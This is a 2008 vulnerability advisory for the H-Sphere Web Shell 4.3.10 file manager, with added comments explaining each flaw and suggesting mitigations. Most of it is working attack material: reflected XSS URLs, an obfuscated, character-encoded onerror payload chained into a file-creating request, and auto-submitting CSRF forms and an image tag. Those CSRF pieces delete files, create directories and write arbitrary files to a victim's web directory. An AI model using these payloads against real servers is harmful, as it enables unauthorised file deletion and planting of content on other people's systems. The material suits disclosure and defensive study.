Web Shell version 4.3.10 suffers from cross site scripting and cross site request forgery vulnerabilities.
6e8d82dccfcb8967815932a7827b2ac2a47e37b85a6e180963497ecd0c82fe86
#=======================================================================#
.____ _________ ._.
| | ______ _ __/ _____/ ____ ____| |
| | / _ \ \/ \/ /\_____ \_/ __ \_/ ___\ |
| |__( <_> ) / / \ ___/\ \___\|
|_______ \____/ \/\_/ /_______ /\___ >\___ >_
\/ \/ \/ \/\/
(http://www.lowsec.org)
#========================================================================#
#========================================================================#
Author: C1c4Tr1Z
Date: 28/09/08
Application: Web Shell version 4.3.10 (2006)
Product WebSite: http://www.psoft.net/HSdocumentation/sysadmin/hsphere-webshell.html
Issues:
[-]Cross-Site Scripting
[-]Cross-Site Request Forgery
Special thanks to OzX (http://www.nullbytes.net/)!
#========================================================================#
#=============================[XSS]======================================#
Proof-of-Concepts:
/actions.php?m=dload&fn=%3Ciframe/src=javascript:alert(%27XSS%27)%3E
/actions.php?m=search&start=1 [POST data: fld=%2F&mask=%3Ciframe%2Fsrc%3Djavascript%3Aalert%280%29%3E]
<!--
This injection makes it possible to create a file (filename: "/XSS") using a short piece of JavaScript.
Note: window.open() can be replaced with an <iframe> to make it stealthier.
Note2: the code is decimal- and hexadecimal-encoded so that the injection succeeds.
Note3: this script uses XMLHttpRequest(), so test it in Firefox!
-->
/actions.php?m=sysinfo&tab=1'><img/src/onerror=%26%23119%26%23105%26%23116%26%23104%26%2340%26%23110%26%23101%26%23119%26%2332%26%2388%26%2377%26%2376%26%2372%26%23116%26%23116%26%23112%26%2382%26%23101%26%23113%26%23117%26%23101%26%23115%26%23116%26%2340%26%2341%26%2341%26%23123%26%2310%26%239%26%23111%26%23112%26%23101%26%23110%26%2340%26%2339%26%2371%26%2369%26%2384%26%2339%26%2344%26%2339%26%23104%26%23116%26%23116%26%23112%26%2358%26%2347%26%2347%26%2357%26%2356%26%2346%26%2349%26%2351%26%2349%26%2346%26%2349%26%2354%26%2352%26%2346%26%2353%26%2347%26%23119%26%23101%26%2398%26%23115%26%23104%26%23101%26%23108%26%23108%26%2352%26%2347%26%2397%26%2399%26%23116%26%23105%26%23111%26%23110%26%23115%26%2346%26%23112%26%23104%26%23112%26%2363%26%23109%26%2361%26%23102%26%23117%26%23116%26%23105%26%23108%26%23115%26%2338%26%2397%26%2399%26%2361%26%23109%26%23107%26%23100%26%2339%26%2344%26%23116%26%23114%26%23117%26%23101%26%2341%26%2344%26%2310%26%239%26%23115%26%23101%26%23110%26%23100%26%2340%26%23110%26%23117%26%23108%26%23108%26%2341%26%2344%26%2310%26%239%26%23111%26%23110%26%23114%26%23101%26%2397%26%23100%26%23121%26%23115%26%23116%26%2397%26%23116%26%23101%26%2399%26%23104%26%2397%26%23110%26%23103%26%23101%26%2361%26%23102%26%23117%26%23110%26%2399%26%23116%26%23105%26%23111%26%23110%26%2340%26%2341%26%23123%26%2310%26%239%26%239%26%23105%26%23102%26%2340%26%23114%26%23101%26%2397%26%23100%26%23121%26%2383%26%23116%26%2397%26%23116%26%23101%26%2361%26%2361%26%2352%26%2332%26%2338%26%2338%26%2332%26%23115%26%23116%26%2397%26%23116%26%23117%26%23115%26%2361%26%2361%26%2350%26%2348%26%2348%26%2341%26%23123%26%2310%26%239%26%239%26%239%26%23119%26%23105%26%23116%26%23104%26%2340%26%23119%26%23105%26%23110%26%23100%26%23111%26%23119%26%2346%26%23111%26%23112%26%23101%26%23110%26%2340%26%2339%26%2339%26%2344%26%2339%26%2395%26%2398%26%23108%26%2397%26%23110%26%23107%26%2339%26%2341%26%2341%26%23123%26%2310%26%239%26%239%26%239%26%239%26%23100%26%23111%26%2399%26%23
117%26%23109%26%23101%26%23110%26%23116%26%2346%26%23119%26%23114%26%23105%26%23116%26%23101%26%2340%26%23114%26%23101%26%23115%26%23112%26%23111%26%23110%26%23115%26%23101%26%2384%26%23101%26%23120%26%23116%26%2346%26%23114%26%23101%26%23112%26%23108%26%2397%26%2399%26%23101%26%2340%26%2347%26%2360%26%2392%26%2347%26%2398%26%23111%26%23100%26%23121%26%2362%26%2347%26%2344%26%2339%26%2360%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2362%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%23103%26%23101%26%23116%26%2369%26%23108%26%23101%26%23109%26%23101%26%23110%26%23116%26%23115%26%2366%26%23121%26%2384%26%2397%26%23103%26%2378%26%2397%26%23109%26%23101%26%2340%26%2334%26%23105%26%23110%26%23112%26%23117%26%23116%26%2334%26%2341%26%2391%26%2350%26%2393%26%2346%26%23118%26%2397%26%23108%26%23117%26%23101%26%2361%26%2334%26%2388%26%2383%26%2383%26%2334%26%2359%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%23102%26%23111%26%23114%26%23109%26%23115%26%2391%26%2348%26%2393%26%2346%26%23115%26%23117%26%2398%26%23109%26%23105%26%23116%26%2340%26%2341%26%2359%26%2360%26%2392%26%2347%26%23115%26%2399%26%23114%26%23105%26%23112%26%23116%26%2362%26%2360%26%2347%26%2398%26%23111%26%23100%26%23121%26%2362%26%2339%26%2341%26%2341%26%2359%26%2310%26%239%26%239%26%239%26%239%26%23100%26%23111%26%2399%26%23117%26%23109%26%23101%26%23110%26%23116%26%2346%26%2399%26%23108%26%23111%26%23115%26%23101%26%2340%26%2341%26%2359%26%2310%26%239%26%239%26%239%26%23125%26%2310%26%239%26%239%26%23125%26%2310%26%239%26%23125%26%2359%26%2310%26%23125>
clear js script:
----------------
// Decoded form of the character-reference-encoded onerror payload above. Per the advisory it
// fetches the m=futils&ac=mkd page over XMLHttpRequest and auto-submits the form found there,
// so the reflected XSS in the `tab` parameter is chained into a file-creating request. The
// chain works only because that form carries no anti-CSRF token; the fix on the server side is
// to HTML-encode reflected parameters and bind state-changing actions to a per-session token.
with(new XMLHttpRequest()){open('GET','http://www.victim.com/actions.php?m=futils&ac=mkd',true),send(null),onreadystatechange=function(){if(readyState==4 && status==200){with(window.open('','_blank')){document.write(responseText.replace(/<\/body>/,'<script>document.getElementsByTagName("input")[2].value="XSS";document.forms[0].submit();<\/script></body>'));document.close();}}};}
#========================================================================#
#============================[CSRF]======================================#
The entire application is vulnerable to CSRF!!
Proof-of-Concepts:
<!--
Delete a file from the server.
-->
<!-- Deletion (m=overkill) is a state-changing action reachable by a plain GET with no
     anti-CSRF token, so an image tag on any page the logged-in user visits is enough.
     Mitigation: accept this action only via POST with a per-session token, and reject
     requests whose Origin/Referer is not the application itself. -->
<img src="http://www.victim.com/actions.php?m=overkill&kill=1&pos=0&fn=FILENAME">
<!--
Create a directory. (It is worth testing whether this can also lead to XSS.)
-->
<!-- Directory creation (m=futils&ac=mkd). The form is a plain urlencoded POST with no
     token, so a cross-origin page can replay it; the only inputs are do/dest/fld, all
     attacker-chosen. Mitigation: a per-session anti-CSRF token checked on every POST
     to actions.php. -->
<form name='mkd' method='POST' action='http://www.victim.com/actions.php?m=futils&ac=mkd&create=1' enctype='application/x-www-form-urlencoded'>
<input type='hidden' name='do' value='yes'>
<INPUT type='text' class='text' name='dest' value="PATH">
<INPUT type='text' class='text' name='fld' value="DIR_NAME">
</form>
<!-- Auto-submits as soon as the page loads; no user interaction is required. -->
<script>document.forms[0].submit()</script>
<!--
Create a file with any type of content. (This is more than dangerous, this is madness..)
-->
<!-- File write (m=edit&save=1). Same missing-token POST as the mkd form, but here the
     response writes an attacker-chosen body to an attacker-chosen path under the web
     directory, which is an arbitrary file write and the most severe of the three issues.
     Mitigation is the same per-session anti-CSRF token, plus path validation on fln. -->
<FORM name='editor' action='http://www.victim.com/actions.php?m=edit&save=1' method='POST' enctype='application/x-www-form-urlencoded'>
<INPUT type="hidden" name="dest">
<INPUT type='text' name='fln' value='/web_dir/FILENAME'>
<TEXTAREA name='body'>
FILE_CONTENT
</TEXTAREA>
</form>
<!-- Auto-submits on load; no user interaction is required. -->
<script>document.forms[0].submit();</script>
#========================================================================#
#========================================================================#
Contact: C1c4Tr1Z <c1c4tr1z@lowsec.org>
(http://www.lowsec.org)
LowSec! Web Application Security (Lab).
Deus ex Machina
#========================================================================#